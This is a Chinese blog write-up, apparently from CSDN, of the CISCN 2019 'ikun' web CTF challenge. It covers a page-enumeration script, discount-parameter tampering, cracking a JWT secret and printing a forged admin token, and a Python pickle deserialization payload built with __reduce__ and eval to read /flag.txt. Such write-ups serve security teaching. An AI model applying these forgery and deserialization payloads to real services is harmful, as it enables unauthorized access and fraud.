[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2022-11-08 17:43:37 发布
最新推荐文章于 2022-11-08 17:43:37 发布
阅读量473 收藏
点赞数
分类专栏: BUUCTF 文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127713498
版权

要买lv6

然后下一页下一页的找,也找不到

来个脚本爆破一下

#coding:utf-8
import requests
import time
for i in range(1,200):
    print(i)
    url = 'http://17dfa3f4-2826-4b97-9d61-a920b6c8976f.node4.buuoj.cn:81/shop?page={}'.format(i)
    r = requests.get(url)
    if 'lv6.png' in r.text:
        print(i)
        break
    if r.status_code == 429:
        print("too fast")
        time.sleep(2)

发现在181页

要买的话我们要先注册一个账号,然后登录

很显然,买不起

看下一购物车

这里有个折扣,我们抓包看一下

这里刚好对应上面的折扣,我们改成0.0000001

还注意到上面有个jwt签名

工具地址:GitHub - brendan-rius/c-jwt-cracker: JWT brute force cracker written in C

解出来,是1Kun

JSON Web Tokens - jwt.io上伪造一份admin的签名

得到

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

然后bp改包

页面源代码

访问/static/asd1f654e683wq/www.zip,得到源码

下面就是代码审计

新知识:Python Pickle反序列化漏洞

Python Pickle反序列化漏洞 - FreeBuf网络安全行业门户

简而言之,pickle的loads在进行反序列化的时候会调用__reduce__魔术方法,也就可以利用该魔术方法构造payload

Admin.py:

脚本:

import pickle
import urllib

class Test(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()" ,))

a = Test()
s = pickle.dumps(a)
print(urllib.quote(s))

 得到:

c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.

刚刚的大会员页面,点击一键成为大会员,并进行抓包,修改become的值

得到flag

 

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 551
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
CISCN2019 华北赛区 Day2 Web1
kid的博客
09-09 1621
CISCN2019 华北赛区 Day2 Web1 前言 最近太懒一直没有怎么学习,今天把《轮到你了》结局看了也极为失望,作为黑岛的舔狗我决定好好刷题提高自己,不然都没有实力去当舔???? (当好舔????真不容易) 打开大佬的博客发现好多新的题和环境…好吧,一道一道来吧 感谢大佬提供的环境:https://github.com/glzjin/CISCN_2019_northern_China_day2_we...
2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 779
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
ikun.exe
10-19
ikun.exe
ikun电脑桌面宠物.exe
09-22
ikun电脑桌面宠物.exe
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
测试一下你是不是IKUN
10-05
代码秀:你干嘛!!!哎呦!!!
struts2 2.5版本的九个jar包
09-07
struts2的最新版本的必需jar包 - commons-fileupload - commons - commons-lang3 - freemarker - javassist - ognl - struts2-core - struts2-json-plugin - xwork-core
love_Ikun.exe
11-10
love_Ikun.exe
ikun真爱粉必备小游戏
05-12
上下左右操作人物类似于炫舞,有真爱粉爱听的背景音乐,超快乐超解压,不快乐你来投诉我,压缩包里面有教程。
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1232
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
ikun python
最新发布
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值